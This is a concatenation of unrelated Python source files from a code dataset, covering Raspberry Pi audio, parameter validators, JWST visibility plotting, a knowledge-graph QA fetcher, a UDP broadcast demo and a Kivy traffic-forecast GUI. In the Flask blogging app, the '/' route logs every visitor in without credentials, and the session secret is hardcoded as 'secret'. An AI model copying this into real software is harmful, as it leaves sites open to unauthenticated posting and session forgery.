pins\r\n\r\nbuzzerPin = 19 #(output signal)\r\nGPIO.setmode(GPIO.BCM)\r\nGPIO.setup(buzzerPin,GPIO.OUT)\r\n\r\nspi = spidev.SpiDev() #create spidev object\r\nspi.open(0,0) #(port, channel)\r\nspi.max_speed_hz = 1000000 #optional, use so you don't overwork RPi\r\n\r\n#Buzz function is provided (uses half period method)\r\n#This code is derived from basic physics of how sound works but to save time\r\n#we googled those calculations.\r\ndef buzz(pitch, duration):\r\n    period = 1.0 / pitch\r\n    delay = period / 2\r\n    cycles = int(duration * pitch)\r\n    for i in range(cycles):\r\n        GPIO.output(buzzerPin, True)\r\n        time.sleep(delay)\r\n        GPIO.output(buzzerPin, False)\r\n        time.sleep(delay)\r\n    time.sleep(duration * 0.3)\r\n\r\ndef readAdc(channel):\r\n    #You may use the incoming parameter to make more flexible later\r\n    #Read the raw data for channel 0 using the xfer2 method, which\r\n    #sends AND receives depending on the clock rise/fall.\r\n    r = spi.xfer2([int('01100000',2), 15])\r\n\r\n    #Get data\r\n    #get 10 bit bitstring from r[0]\r\n    s = bin(r[0])[2:].zfill(10)\r\n    #append 8 '0's to last 2 bits from r[0]\r\n    data = int(s[8:] + '0'*8, 2) + r[1]\r\n    return data\r\n\r\ndata = np.loadtxt(\"song.txt\")\r\nprint(data)\r\npitches = np.int_(data[:,0])\r\nprint(pitches)\r\n\r\nwhile True:\r\n    x = readAdc(0)\r\n    print(x)\r\n    for val1, val2 in zip(pitches,data[:,1]):\r\n        buzz(val1, val2)\r\n\r\n    buzz(500,.2)\r\n\r\n\r\n\r\n","sub_path":"lab3/sound.py","file_name":"sound.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"87831329","text":"import datetime\n\nimport numpy as np\nfrom marshmallow import (\n    validate as marshmallow_validate,\n    ValidationError,\n    fields as marshmallow_fields,\n)\n\nfrom paramtools import utils\n\n\nclass Range(marshmallow_validate.Range):\n    
\"\"\"\n Implements \"range\" :ref:`spec:Validator object`.\n \"\"\"\n\n error = \"\"\n\n def __init__(\n self, min=None, max=None, error_min=None, error_max=None, step=None\n ):\n self.min = min\n self.max = max\n self.error_min = error_min\n self.error_max = error_max\n self.step = step or 1 # default to 1\n\n def _format_error(self, value, message):\n return message.format(input=value, min=self.min, max=self.max)\n\n def __call__(self, value):\n if value is None:\n return value\n if not isinstance(value, list):\n value_list = [value]\n else:\n value_list = utils.ravel(value)\n\n for val in value_list:\n if self.min is not None and val < self.min:\n message = self.error_min or self.message_min\n raise ValidationError(self._format_error(value, message))\n\n if self.max is not None and val > self.max:\n message = self.error_max or self.message_max\n raise ValidationError(self._format_error(value, message))\n\n return value\n\n def grid(self):\n # make np.arange inclusive.\n max_ = self.max + self.step\n arr = np.arange(self.min, max_, self.step)\n return arr[arr <= self.max].tolist()\n\n\nclass DateRange(Range):\n \"\"\"\n Implements \"date_range\" :ref:`spec:Validator object`.\n Behaves like ``Range``, except values are ensured to be\n ``datetime.date`` type and ``grid`` has special logic for dates.\n \"\"\"\n\n def __init__(\n self, min=None, max=None, error_min=None, error_max=None, step=None\n ):\n if min is not None and not isinstance(min, datetime.date):\n min = marshmallow_fields.Date()._deserialize(min, None, None)\n if max is not None and not isinstance(max, datetime.date):\n max = marshmallow_fields.Date()._deserialize(max, None, None)\n\n super().__init__(min, max, error_min, error_max)\n\n if step is None:\n # set to to default step.\n step = {\"days\": 1}\n # check against allowed args:\n # https://docs.python.org/3/library/datetime.html#datetime.timedelta\n timedelta_args = {\n \"days\",\n \"seconds\",\n \"microseconds\",\n \"milliseconds\",\n \"minutes\",\n \"hours\",\n \"weeks\",\n }\n assert len(set(step.keys()) - timedelta_args) == 0\n self.step = datetime.timedelta(**step)\n\n def grid(self):\n # make np.arange inclusive.\n max_ = self.max + self.step\n arr = np.arange(self.min, max_, self.step, dtype=datetime.date)\n return arr[arr <= self.max].tolist()\n\n\nclass OneOf(marshmallow_validate.OneOf):\n \"\"\"\n Implements \"choice\" :ref:`spec:Validator object`.\n \"\"\"\n\n def __call__(self, value):\n if value is None:\n return value\n if not isinstance(value, list):\n values = [value]\n else:\n values = utils.ravel(value)\n for val in values:\n try:\n if val not in self.choices:\n raise ValidationError(self._format_error(val))\n except TypeError:\n raise ValidationError(self._format_error(val))\n return value\n\n def grid(self):\n return self.choices\n","sub_path":"paramtools/contrib/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"289892080","text":"first_name = input('Введите Ваше имя: ')\nlast_name = input('Введите Вашу фамилию: ')\nage = int(input('Введите Ваш возраст: '))\nweight = int(input('Введите Ваш вес: '))\n\nrecommendation = ''\nif age <= 30 and 120 >= weight > 50: # age ∈ [0:30] weight ∈ (50:120]\n recommendation = \"хорошее состояние\"\nelif age > 30 and 120 >= weight > 50: # age ∈ (30:+infinity] weight ∈ (50:120]\n recommendation = \"нормальное состояние\"\nelif age > 40 and not 120 >= weight > 50: # age ∈ 
(40:+infinity] weight ∈ [0:50] & (120:+infinity]\n recommendation = \"следует обратится к врачу!\"\nelif age > 30 and not 120 >= weight > 50: # age ∈ (30:+infinity] weight ∈ [0:50] & (120:+infinity]\n recommendation = \"следует заняться собой\"\nelse:\n recommendation = \"жить будите\"\n\nprint(\"%s %s, %d год, вес %d - %s\" % (first_name, last_name, age, weight, recommendation))\n","sub_path":"l1_task_3.py","file_name":"l1_task_3.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"218849328","text":"#Produces a graph of the visibility & accessible position angles\r\n#for a given RA & DEC, and prints out corresponding information,\r\n#including the ranges of accessible and inaccessible PAs.\r\n#\r\n#Usage: python visibilityPA.py RA DEC [targetName]\r\n# if targetName is specified, then the figure is saved\r\n#\r\n#-Created by David Lafreniere, March 2016\r\n#-makes use of (and hacks) several scripts created by Pierre Ferruit\r\n# that are part of the JWST Python tools JWSTpylib and JWSTpytools\r\n\r\n\r\nimport sys\r\nfrom . import ephemeris_old2x as EPH\r\nimport math\r\nimport numpy as np\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.dates as mdates\r\nfrom matplotlib.ticker import AutoMinorLocator\r\nfrom matplotlib.ticker import MultipleLocator\r\nfrom astropy.io import ascii\r\nimport os\r\nimport pkg_resources\r\nimport datetime\r\n\r\nD2R = math.pi/180. #degrees to radians\r\nR2D = 180./math.pi #radians to degrees \r\n\r\ndef convert_ddmmss_to_float(astring):\r\n aline = astring.split(':')\r\n d = float(aline[0])\r\n m = float(aline[1])\r\n s = float(aline[2])\r\n hour_or_deg = (s/60.+m)/60.+d\r\n return hour_or_deg\r\n\r\ndef checkVisPA(ra, dec, targetName=None, ephFileName=pkg_resources.resource_filename('ExoCTK', 'data/contam_visibility/JWST_ephem_short.txt'), save=False, fig=''):\r\n \r\n if ra.find(':')>-1: #format is hh:mm:ss.s or dd:mm:ss.s \r\n ra = convert_ddmmss_to_float(ra) * 15. 
* D2R\r\n dec = convert_ddmmss_to_float(dec) * D2R\r\n else: #format is decimal\r\n ra = float(ra) * D2R\r\n dec = float(dec) * D2R\r\n\r\n #load ephemeris\r\n eclFlag = False\r\n eph = EPH.Ephemeris(ephFileName, eclFlag)\r\n \r\n #convert dates from MJD to Gregorian calendar dates\r\n mjd = np.array(eph.datelist)\r\n d = mdates.julian2num(mjd+2400000.5)\r\n gd = mdates.num2date(d)\r\n\r\n #loop through dates and determine VIS and PAs (nominal, min, max)\r\n vis = np.empty(mjd.size,dtype=bool)\r\n paNom, paMin, paMax = np.empty(mjd.size), np.empty(mjd.size), np.empty(mjd.size)\r\n for i in range(mjd.size):\r\n \r\n #is it visible?\r\n vis[i] = eph.in_FOR(mjd[i],ra,dec)\r\n \r\n #nominal PA at this date\r\n pa = eph.normal_pa(mjd[i],ra,dec)\r\n\r\n #search for minimum PA allowed by roll\r\n pa0 = pa\r\n while eph.is_valid(mjd[i],ra,dec,pa0-0.002):\r\n pa0 -= 0.002\r\n \r\n #search for maximum PA allowed by roll\r\n pa1 = pa\r\n while eph.is_valid(mjd[i],ra,dec,pa1+0.002):\r\n pa1 += 0.002\r\n\r\n paNom[i] = (pa*R2D)%360\r\n paMin[i] = (pa0*R2D)%360\r\n paMax[i] = (pa1*R2D)%360\r\n\r\n #does PA go through 360 deg?\r\n wrap = np.any(np.abs(np.diff(paNom[np.where(vis)[0]])) > 350)\r\n\r\n #Determine good and bad PA ranges\r\n #Good PAs\r\n i, = np.where(vis)\r\n pa = np.concatenate((paNom[i],paMin[i],paMax[i]))\r\n \r\n if wrap: \r\n pa = np.append(pa,(0.,360.))\r\n pa.sort()\r\n \r\n i1, = np.where(np.diff(pa)>10)\r\n i0 = np.insert(i1+1,0,0)\r\n i1 = np.append(i1,-1)\r\n paGood = np.dstack((pa[i0],pa[i1])).round(1).reshape(-1,2).tolist()\r\n\r\n #bad PAs (complement of the good PAs)\r\n paBad = []\r\n if paGood[0][0]>0:\r\n paBad.append([0.,paGood[0][0]])\r\n for i in range(1,len(paGood)):\r\n paBad.append([paGood[i-1][1],paGood[i][0]])\r\n if paGood[-1][1]<360.:\r\n paBad.append([paGood[-1][1],360.])\r\n\r\n #print results to file\r\n \"\"\"\r\n if save:\r\n fName='visibilityPA-'+targetName+'.txt'\r\n fic=open(fName,'w')\r\n\r\n fic.write('#Date MJD VIS? 
PAnom PArange\\n')\r\n for i in range(vis.size):\r\n tmp1='{:7.3f}'.format(paNom[i]) if vis[i] else 7*'-'\r\n tmp2='{:7.3f}--{:7.3f}'.format(paMin[i],paMax[i]) if vis[i] else 16*'-'\r\n #fic.write(gd[i].strftime(\"%y-%m-%d\")+' {:f} {:5s} {:7.3f} {:7.3f}--{:7.3f} \\n'.format(mjd[i],str(vis[i]),paNom[i],paMin[i],paMax[i]))\r\n fic.write(gd[i].strftime(\"%y-%m-%d\")+' {:f} {:5s} {} {} \\n'.format(mjd[i],str(vis[i]),tmp1,tmp2))\r\n\r\n fic.write(\"\\n\")\r\n fic.write(\"Accessible PA ranges: \")\r\n fic.write(','.join([str(x) for x in paGood]))\r\n fic.write(\"\\n\")\r\n fic.write(\"Non-accessible PA ranges: \")\r\n fic.write(','.join([str(x) for x in paBad]))\r\n fic.write(\"\\n\")\r\n fic.close()\r\n \"\"\"\r\n # Make a figure\r\n if not fig or fig==True:\r\n fig = plt.gcf()\r\n \r\n # Do all figure calculations\r\n iBad, = np.where(vis==False)\r\n paMasked = np.copy(paNom)\r\n paMasked[iBad] = np.nan\r\n gdMasked = np.copy(gd)\r\n\r\n i = np.argmax(paNom)\r\n if paNom[i+1]<10: \r\n i+=1\r\n paMasked = np.insert(paMasked,i,np.nan)\r\n gdMasked = np.insert(gdMasked,i,gdMasked[i])\r\n\r\n i = np.argmax(paMin)\r\n goUp = paMin[i-2]<paMin[i-1] #PA going up at wrap point?\r\n\r\n # Top part\r\n i0_top = 0 if goUp else i\r\n i1_top = i if goUp else paMin.size-1\r\n paMaxTmp = np.copy(paMax)\r\n paMaxTmp[np.where(paMin>paMax)[0]] = 360\r\n \r\n # Bottom part\r\n i = np.argmin(paMax)\r\n i0_bot = i if goUp else 0\r\n i1_bot = paMin.size-1 if goUp else i \r\n paMinTmp = np.copy(paMin)\r\n paMinTmp[np.where(paMin>paMax)[0]] = 0\r\n\r\n # Add fits to matplotlib\r\n if isinstance(fig, matplotlib.figure.Figure):\r\n\r\n # Make axes\r\n ax = plt.axes()\r\n plt.title(targetName)\r\n \r\n #plot nominal PA\r\n plt.plot(gdMasked,paMasked,color='k')\r\n \r\n #plot ranges allowed through roll\r\n if wrap:\r\n i = np.argmax(paMin)\r\n goUp = paMin[i-2]<paMin[i-1] #PA going up at wrap point?\r\n \r\n #top part\r\n plt.fill_between(gd[i0_top:i1_top+1],paMin[i0_top:i1_top+1],paMaxTmp[i0_top:i1_top+1],where=vis[i0_top:i1_top+1],lw=0,facecolor='k',alpha=0.5)\r\n \r\n #bottom part\r\n plt.fill_between(gd[i0_bot:i1_bot+1],paMinTmp[i0_bot:i1_bot+1],paMax[i0_bot:i1_bot+1],where=vis[i0_bot:i1_bot+1],lw=0,facecolor='k',alpha=0.5)\r\n \r\n else:\r\n plt.fill_between(gd,paMin,paMax,where=vis,lw=0,facecolor='k',alpha=0.5)\r\n\r\n plt.ylabel('Position Angle (degrees)')\r\n plt.xlim(min(gd),max(gd))\r\n ax.xaxis.set_major_locator(mdates.MonthLocator())\r\n ax.xaxis.set_major_formatter(mdates.DateFormatter(\"%b '%y\"))\r\n ax.xaxis.set_minor_locator(mdates.DayLocator(list(range(1,32,5))))\r\n plt.ylim(0,360)\r\n ax.yaxis.set_major_locator(MultipleLocator(25))\r\n ax.yaxis.set_minor_locator(MultipleLocator(5))\r\n plt.grid()\r\n for label in ax.get_xticklabels():\r\n label.set_rotation(45)\r\n \r\n # Or to bokeh!\r\n else:\r\n \r\n # Convert datetime to a number for Bokeh\r\n gdMaskednum = [datetime.date(2019, 6, 1)+datetime.timedelta(days=n) for n,d in enumerate(gdMasked)]\r\n color = 'green'\r\n\r\n # Draw the curve and error\r\n fig.line(gdMaskednum, paMasked, legend='cutoff', line_color=color)\r\n \r\n # Top\r\n err_y = np.concatenate([paMin[i0_top:i1_top+1],paMaxTmp[i0_top:i1_top+1][::-1]])\r\n # err_x = np.concatenate([[d.timestamp() for d in gd[i0_top:i1_top+1]],[d.timestamp() for d in gd[i0_top:i1_top+1]][::-1]])\r\n err_x = np.concatenate([gdMaskednum[i0_top:i1_top+1],gdMaskednum[i0_top:i1_top+1][::-1]])\r\n fig.patch(err_x, err_y, color=color, fill_alpha=0.2, line_alpha=0)\r\n\r\n # Bottom\r\n err_y = 
np.concatenate([paMinTmp[i0_bot:i1_bot+1],paMax[i0_bot:i1_bot+1][::-1]])\r\n # err_x = np.concatenate([[d.timestamp() for d in gd[i0_bot:i1_bot+1]],[d.timestamp() for d in gd[i0_bot:i1_bot+1]][::-1]])\r\n err_x = np.concatenate([gdMaskednum[i0_bot:i1_bot+1],gdMaskednum[i0_bot:i1_bot+1][::-1]])\r\n fig.patch(err_x, err_y, color=color, fill_alpha=0.2, line_alpha=0)\r\n \r\n # Plot formatting\r\n fig.xaxis.axis_label = 'Date'\r\n fig.yaxis.axis_label = 'Position Angle (degrees)'\r\n \r\n return paGood, paBad, gd, fig\r\n\r\n","sub_path":"ExoCTK/contam_visibility/visibilityPA.py","file_name":"visibilityPA.py","file_ext":"py","file_size_in_byte":8061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"640814718","text":"n = int(input(\"n: \")) \nm = int(input(\"m: \"))\nih = 0\nfor i in range(n,m+1):\n count = 0\n for j in range(2,i//2+1):\n if i%j==0:\n count=count+1\n if count==0:\n if i > ih:\n ih = i\nprint(ih)\n","sub_path":"хичээл00/9_2_12.py","file_name":"9_2_12.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"293810400","text":"# Copyright (c) 2021 OpenKS Authors, DCD Research Lab, Zhejiang University. \n# All Rights Reserved.\n\n\"\"\"\nAnswer fetch progam to receive structured question and get possible answers\n\"\"\"\nimport logging\nfrom sklearn.metrics.pairwise import euclidean_distances\nfrom typing import TypeVar\nfrom .question_parser import StrucQ\nfrom ...abstract.mtg import MTG\n\nlogger = logging.getLogger(__name__)\nT = TypeVar('T')\n\nclass AnswerFetcher(object):\n\n\tdef __init__(self, struc_q: StrucQ) -> None:\n\t\tself.struc_q = struc_q\n\n\tdef struc_q_rule_check(self) -> bool:\n\t\tif len(self.struc_q.relations) == 0:\n\t\t\tlogger.warn(\"No relation found from the question.\")\n\t\t\treturn False\n\t\telif len(self.struc_q.entities) == 0:\n\t\t\tlogger.warn(\"No entity found from the question.\")\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\n\tdef struc_q_embed_check(self) -> bool:\n\t\tif self.struc_q.q_entity_embed.size == 0 and self.struc_q.q_relation_embed.size == 0 and self.struc_q.q_embed.size == 0:\n\t\t\tlogger.warn(\"No embedding computed from the question.\")\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\n\tdef fetch_by_matching(self, graph: MTG) -> T:\n\t\t\"\"\" fetch the answer through matching MTG knowledge graph dataset \"\"\"\n\t\tif not self.struc_q_rule_check():\n\t\t\treturn None\n\n\t\tentity_info = self.struc_q.entities[0]\n\t\trelation_type = self.struc_q.relations[0]\n\t\ttarget_type = self.struc_q.target_type['type']\n\t\tquestion_type = self.struc_q.question_class['type']\n\n\t\tentity_id = entity_info['id']\n\t\tentity_type = entity_info['type']\n\t\tsource_rel_col_index = 0\n\t\ttarget_rel_col_index = 0\n\t\tfor item in graph.schema:\n\t\t\tif item['type'] == 'relation' and item['concept'] == relation_type:\n\t\t\t\tif item['members'].index(entity_type) == 0:\n\t\t\t\t\tsource_rel_col_index = 0\n\t\t\t\t\ttarget_rel_col_index = 2\n\t\t\t\telse:\n\t\t\t\t\tsource_rel_col_index = 2\n\t\t\t\t\ttarget_rel_col_index = 0\n\n\t\ttarget_ids = []\n\t\tfor rel in graph.triples:\n\t\t\tif rel[0][1] == relation_type:\n\t\t\t\tif rel[0][source_rel_col_index] == entity_id:\n\t\t\t\t\ttarget_ids.append(rel[0][target_rel_col_index])\n\n\t\ttarget_items = []\n\t\tfor ent in graph.entities:\n\t\t\tif ent[1] == target_type:\n\t\t\t\tfor tar_id in target_ids:\n\t\t\t\t\tif ent[0] == 
tar_id:\n\t\t\t\t\t\ttarget_items.append(ent)\n\t\ttarget_props = [item['properties'] for item in graph.schema if item['type'] == 'entity' and item['concept'] == target_type]\n\t\ttarget_cols = [item['name'] for item in target_props[0]]\n\t\tres = []\n\t\tfor item in target_items:\n\t\t\ttmp = {}\n\t\t\tfor key, value in zip(target_cols, item[2]):\n\t\t\t\ttmp[key] = value\n\t\t\tres.append(tmp)\n\t\tif question_type == 'entity':\n\t\t\treturn res\n\t\telif question_type == 'quantity':\n\t\t\treturn len(res)\n\n\tdef fetch_by_db_query(self, graph_db) -> T:\n\t\t\"\"\" fetch the answer through querying outside knowledge databases \"\"\"\n\t\tfinal_answers = []\n\t\tfor sql_ in self.struc_q.neo_sqls:\n\t\t\tquestion_type = sql_['type']\n\t\t\tqueries = sql_['sql']\n\t\t\tanswers = []\n\t\t\tfor query in queries:\n\t\t\t\tress = graph_db.run(query).data()\n\t\t\t\tanswers += ress\n\t\t\tfinal_answers.append(answers)\n\t\treturn final_answers\n\n\tdef fetch_by_similarity(self, embeddings) -> T:\n\t\t\"\"\" \n\t\tfetch the answer through calculating vector similarities \n\t\trefer to paper: Knowledge Graph Embedding Based Question Answering, WSDM 2019\n\n\t\t\"\"\"\n\t\tif not self.struc_q_embed_check():\n\t\t\treturn None\n\n\t\telse:\n\t\t\t# should calculate embedding similarities between question and graph nodes\n\t\t\t# match entity name in MTG graph to filter a smaller set of candidates\n\t\t\tmatched_ids = entity_name_match(self.struc_q.entities, self.graph)\n\t\t\t# further calculate distances between question entity embeddings and graph embeddings\n\t\t\tsimilarities = euclidean_distances(self.struc_q.q_entity_embed * len(matched_ids), embeddings[matched_ids], squared=True).argsort(axis=1)\n\t\t\t# get the shortest distance entity id\n\t\t\tindex_top = sort_with_index(similarities)[0]\n\t\t\t# use relation function to calculate the target entity embedding\n\t\t\ttarget_embed = relation_func(self.struc_q.q_entity_embed[index_top], self.struc_q.q_relation_embed)\n\t\t\t# find the closest target entity id\n\t\t\tclosest_target_id = find_closest(target_embed, embeddings)\n\t\t\t# get the target entity object\n\t\t\tanswer = [ent for ent in self.graph.entities if ent[0] == closest_target_id][0]\n\t\t\treturn answer\n\n\ndef entity_name_match(entities, graph):\n\treturn NotImplemented\n\ndef sort_with_index(value_array):\n\treturn NotImplemented\n\ndef relation_func(head, relation):\n\treturn NotImplemented\n\ndef find_closest(embed, embeddings):\n\treturn NotImplemented\n\n\n","sub_path":"openks/apps/qa/answer_fetcher.py","file_name":"answer_fetcher.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"529799702","text":"import socket\r\n\r\ndest = ('<broadcast>', 7788)\r\n\r\n# Create a UDP socket\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\r\n# Enable broadcasting on this socket (SO_BROADCAST is a socket option, not a socket type)\r\n\r\ns.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\r\n\r\n# Send the data as a broadcast to every machine on the local network\r\ns.sendto(b\"Hi\", dest)\r\n\r\nprint(\"Waiting for replies (exit to quit)\")\r\n\r\nwhile True:\r\n    (buf, address) = s.recvfrom(2048)\r\n    print(\"Received from %s: %s\" % (address, buf))\r\n","sub_path":"网络编程/网络编程中的广播.py","file_name":"网络编程中的广播.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"327137921","text":"\n\n# generator\n# a = (row for row in range(10))\n# print(next(a))\n\n\nimport redis\n\nr = redis.Redis(host=\"\", port=6379)\n\nuser_cart = 
r.keys(\"1_3_*\")\nprint(user_cart)\n\n\na = {\n \"a\": 1,\n \"b\": 1\n}\n\nprint(sum(a.values()))","sub_path":"20171010/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"163449498","text":"\nfrom flask import Flask, render_template_string, redirect\nfrom sqlalchemy import create_engine, MetaData\nfrom flask_login import UserMixin, LoginManager, \\\n login_user, logout_user\nfrom flask_blogging import SQLAStorage, BloggingEngine\nfrom flask import render_template\nimport os\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = \"secret\" # for WTF-forms and login\napp.config[\"BLOGGING_URL_PREFIX\"] = \"/blog\"\napp.config[\"BLOGGING_DISQUS_SITENAME\"] = \"test\"\napp.config[\"BLOGGING_SITEURL\"] = \"https://android-flask-academy.herokuapp.com\"\napp.config['DATABASE_URL']='DATABASE_URL'\nSQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or \\\n 'sqlite:///' + os.path.join(basedir, 'app.db')\n# extensions\nengine = create_engine(SQLALCHEMY_DATABASE_URI)\nmeta = MetaData()\nsql_storage = SQLAStorage(engine, metadata=meta)\nblog_engine = BloggingEngine(app, sql_storage)\nlogin_manager = LoginManager(app)\nmeta.create_all(bind=engine)\n\n# user class for providing authentication\nclass User(UserMixin):\n def __init__(self, user_id):\n self.id = user_id\n\n def get_name(self):\n return \"sammy Mutahi\" # typically the user's name\n\n@login_manager.user_loader\n@blog_engine.user_loader\ndef load_user(user_id):\n return User(user_id)\n\n\n# @app.route(\"/\")\n# def index():\n# return render_template('index.html')\n\n@app.route(\"/\")\ndef login():\n user = User(\"testuser\")\n login_user(user)\n return redirect(\"/blog\")\n\n@app.route(\"/logout/\")\ndef logout():\n logout_user()\n return redirect(\"/\")\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"373439458","text":"import xbmcgui\n\ndef display_error_message(\n message,\n title=\"Projector Command Failed\",\n type_=xbmcgui.NOTIFICATION_ERROR,\n time=1000,\n sound=True):\n \"\"\"Display an error message in the Kodi interface\"\"\"\n display_message(message, title=title, type_=type_, time=time, sound=sound)\n\ndef display_message(\n message, \n title=\"Report from projector\", \n type_=xbmcgui.NOTIFICATION_INFO,\n time=5000,\n sound=False):\n \"\"\"Display an informational message in the Kodi interface\"\"\"\n\n dialog = xbmcgui.Dialog()\n dialog.notification(\n title, \n message,\n type_,\n time,\n sound)\n\n","sub_path":"lib/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"473094202","text":"from kivy.app import App\n\nfrom kivy.uix.screenmanager import Screen, ScreenManager\nfrom kivy.uix.label import Label\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.button import Button\nfrom kivy.uix.spinner import Spinner, SpinnerOption\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.popup import Popup\nfrom datepicker import DatePicker\nfrom kivy.uix.textinput import TextInput\nfrom kivy.properties import NumericProperty, ObjectProperty, StringProperty, ListProperty, BooleanProperty\nfrom kivy.uix.image import Image\nfrom kivy.uix.progressbar import ProgressBar 
\nfrom kivy.uix.recycleview.views import RecycleDataViewBehavior\nfrom kivy.uix.recyclegridlayout import RecycleGridLayout\nfrom kivy.uix.behaviors import FocusBehavior\nfrom kivy.uix.recycleview.layout import LayoutSelectionBehavior\nfrom kivy.garden.matplotlib.backend_kivyagg import FigureCanvasKivyAgg\nfrom kivy.garden.mapview import MapView, MapMarker\nfrom kivy.clock import Clock\nfrom tkinter.messagebox import showerror\nimport tkinter as tk\n\nfrom train import Train, RegionSelector\nfrom threading import Thread\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom kivy.clock import mainthread\nfrom datetime import datetime\n\n\ntk.Tk().withdraw()\nfile_name=\"results.csv\"\ndatetime_format = \"%d-%m-%Y %H:%M\"\n\nclass MapApp(App):\n \n def build(self):\n self.default_title = \"Trafik Akis Hizi Tahmini\" \n self.title = self.default_title\n sm = ScreenManager()\n\n home = HomeScreen(name=\"home\")\n hyper = HyperScreen(self, name='hyper')\n train = TrainScreen(name=\"train\")\n results = ResultsScreen(name='res')\n\n \n\n sm.add_widget(hyper)\n sm.add_widget(train)\n sm.add_widget(results)\n sm.add_widget(home)\n \n sm.current = \"home\"\n \n return sm\n \n\nclass HyperScreen(Screen):\n\n def __init__(self, app,*args, **kwargs):\n super(HyperScreen, self).__init__(*args, **kwargs)\n self.app = app\n self.regions = RegionSelector()\n self.settings_popup = SettingsPopUp()\n self.preprocess_popup = PreprocessPopup()\n self.markers = {}\n self.current_marker_id = -1\n self.ids.region.values = self.regions.get_provinces()\n \n def settings_button_click(self):\n self.settings_popup.open()\n\n def check_parameters_for_train(self):\n if self.current_marker_id == -1:\n showerror(\"HATA\", \"Lutfen bolge seciniz\")\n return False\n \n elif self.markers[self.current_marker_id].default_source == \"./marker_ims/red.png\":\n showerror(\"HATA\", \"Sectiginiz bolgede yeterli veri yok. 
Kirmizi veri noktalari secilememektedir.\")\n return False\n\n elif self.settings_popup.ids.epoch.text == \"\":\n showerror(\"HATA\", \"Epoch sayisi bos olamaz\")\n return False\n \n elif self.settings_popup.ids.time_step.text == \"\":\n showerror(\"HATA\", \"Zaman sekansi boyutu bos olamaz\")\n return False\n\n elif self.settings_popup.ids.batch.text == \"\":\n showerror(\"HATA\", \"Batch boyutu bos olamaz\")\n return False\n\n train_start_date = datetime.strptime(self.ids.train_start.text + \" 00:00\", datetime_format)\n train_end_date = datetime.strptime(self.ids.train_end.text + \" 00:00\", datetime_format)\n test_start_date = datetime.strptime(self.ids.test_start.text + \" 00:00\", datetime_format)\n test_end_date = datetime.strptime(self.ids.test_end.text + \" 00:00\", datetime_format)\n \n if train_end_date < train_start_date or test_end_date < test_start_date:\n showerror(\"HATA\", \"Baslangic tarihleri bitis tarihlerinden once olmalidir\")\n return False\n \n else:\n return True\n\n def start_train_button(self):\n if self.check_parameters_for_train() == False:\n return\n \n self.manager.screens[1].ids.progress.max = int(self.settings_popup.ids.epoch.text)\n self.manager.screens[1].ids.progress.value = 0\n self.manager.current = self.manager.screens[1].name\n self.app.title = self.build_result_title()\n self.weekday = True\n if self.settings_popup.ids.day.text == 'Hayir':\n self.weekday = False\n \n self.daypart = True\n if self.settings_popup.ids.daypart.text == \"Hayir\":\n self.daypart = False\n \n self.prev_weeks = 0\n if self.settings_popup.ids.prev_weeks.text == \"1 ve 2 hafta\":\n self.prev_weeks = 1\n elif self.settings_popup.ids.prev_weeks.text == \"1, 2 ve 3 hafta\":\n self.prev_weeks = 2\n self.train_thread = Thread(target=self.fit, args=(int(self.settings_popup.ids.epoch.text),))\n self.train_thread.setDaemon(True)\n self.train_thread.start()\n\n def fit(self, epochs): \n train_loss_history = []\n test_loss_history = []\n epoch_history = {\"train\": train_loss_history, \"test\":test_loss_history}\n id = self.regions.find_id_from_address(self.ids.sensor.text)\n source_name = RegionSelector.build_file_name(self.ids.region.text, id)\n \n if RegionSelector.check_data_exist(source_name) == False:\n self.preprocess_popup.open()\n RegionSelector.pull_data_from_database(id, self.ids.region.text)\n RegionSelector.preprocess(id, self.ids.region.text, self.preprocess_popup)\n self.preprocess_popup.dismiss()\n\n self.train_object = Train(\n source_name,\n self.weekday, \n self.ids.train_start.text,\n self.ids.train_end.text,\n self.ids.test_start.text,\n self.ids.test_end.text,\n int(self.settings_popup.ids.time_step.text),\n self.prev_weeks,\n self.daypart\n ) \n for i in range(epochs):\n temp_train, temp_test = self.train_object.fit(\n int(self.settings_popup.ids.batch.text)\n )\n epoch_history[\"train\"].append(temp_train)\n epoch_history[\"test\"].append(temp_test)\n self.manager.screens[1].update_results(epoch_history, i+1, epochs)\n self.manager.screens[1].ids.progress.value = i+1\n \n self.train_object.save_estimations(file_name)\n self.manager.screens[2].get_dataframe()\n self.manager.screens[1].ids.results.disabled = False\n self.manager.screens[1].ids.home.disabled = False\n self.build_result_title()\n 